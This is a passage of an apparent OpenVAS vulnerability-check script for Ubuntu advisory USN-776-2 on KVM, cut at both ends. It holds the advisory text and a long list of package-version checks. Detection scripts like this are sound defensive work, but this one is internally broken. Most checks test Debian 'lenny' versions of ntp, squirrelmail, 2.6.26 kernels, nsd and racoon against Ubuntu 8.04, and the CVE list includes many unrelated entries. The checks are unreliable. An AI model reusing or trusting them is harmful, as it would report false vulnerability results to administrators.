Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n kvm 1:62+dfsg-0ubuntu8.2\n\nAfter a standard system upgrade you need to restart all KVM VMs to effect\nthe necessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-776-2\";\n\ntag_insight = \"USN-776-1 fixed vulnerabilities in KVM. Due to an incorrect fix, a\nregression was introduced in Ubuntu 8.04 LTS that caused KVM to fail to\nboot virtual machines started via libvirt. This update fixes the problem.\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\n Avi Kivity discovered that KVM did not correctly handle certain disk\n formats. 
A local attacker could attach a malicious partition that would\n allow the guest VM to read files on the VM host. (CVE-2008-1945,\n CVE-2008-2004)\n\n Alfredo Ortega discovered that KVM's VNC protocol handler did not\n correctly validate certain messages. A remote attacker could send\n specially crafted VNC messages that would cause KVM to consume CPU\n resources, leading to a denial of service. (CVE-2008-2382)\n\n Jan Niehusmann discovered that KVM's Cirrus VGA implementation over VNC\n did not correctly handle certain bitblt operations. A local attacker could\n exploit this flaw to potentially execute arbitrary code on the VM host or\n crash KVM, leading to a denial of service. (CVE-2008-4539)\n\n It was discovered that KVM's VNC password checks did not use the correct\n length. A remote attacker could exploit this flaw to cause KVM to crash,\n leading to a denial of service. (CVE-2008-5714)\";\ntag_summary = \"The remote host is missing an update to kvm\nannounced via advisory USN-776-2.\";\n\n \n\n\nif(description)\n{\n script_id(64175);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2008-1945\", \"CVE-2008-2004\", \"CVE-2008-2382\", \"CVE-2008-4539\", \"CVE-2008-5714\", \"CVE-2009-1130\", \"CVE-2009-1574\", \"CVE-2009-0714\", \"CVE-2008-1517\", \"CVE-2007-2807\", \"CVE-2009-0159\", \"CVE-2009-1252\", \"CVE-2009-1578\", \"CVE-2009-1579\", \"CVE-2009-1580\", \"CVE-2009-1581\", \"CVE-2009-1418\", \"CVE-2009-0028\", \"CVE-2009-0269\", \"CVE-2009-0342\", \"CVE-2009-0343\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-1184\", \"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\", \"CVE-2009-0154\", \"CVE-2009-1150\", \"CVE-2009-1151\", \"CVE-2009-0922\", \"CVE-2009-1632\", \"CVE-2009-0945\", \"CVE-2009-0688\", \"CVE-2009-1527\", \"CVE-2009-1338\", 
\"CVE-2009-1242\", \"CVE-2009-1192\", \"CVE-2009-1439\", \"CVE-2009-1337\", \"CVE-2009-0157\", \"CVE-2008-5077\", \"CVE-2008-5814\", \"CVE-2009-0721\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1072\", \"CVE-2009-1265\", \"CVE-2009-1011\", \"CVE-2009-1010\", \"CVE-2009-1009\", \"CVE-2009-1161\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-776-2 (kvm)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-776-2/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kvm-source\", ver:\"62+dfsg-0ubuntu8.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kvm\", ver:\"62+dfsg-0ubuntu8.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.2.p4+dfsg-2etch3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.2.p4+dfsg-2etch3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) 
!= NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-3ubuntu2.2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"1.4.15-4+lenny1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.26-2\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-generic\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-alpha\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-xen\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-openvz\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-vserver\", ver:\"2.6.26-15lenny2\", 
rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"user-mode-linux\", ver:\"2.6.26-1um-2+15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-arm\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-versatile\", 
ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-armel\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-hppa\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-i386\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n 
report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-ia64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1-bcm91250a\", 
ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mips\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mipsel\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", 
rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390-tape\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-s390\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-sparc\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nsd\", ver:\"2.3.7-1.1+lenny1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nsd3\", ver:\"3.0.7-3.lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"racoon\", ver:\"0.7.1-1.3+lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n 
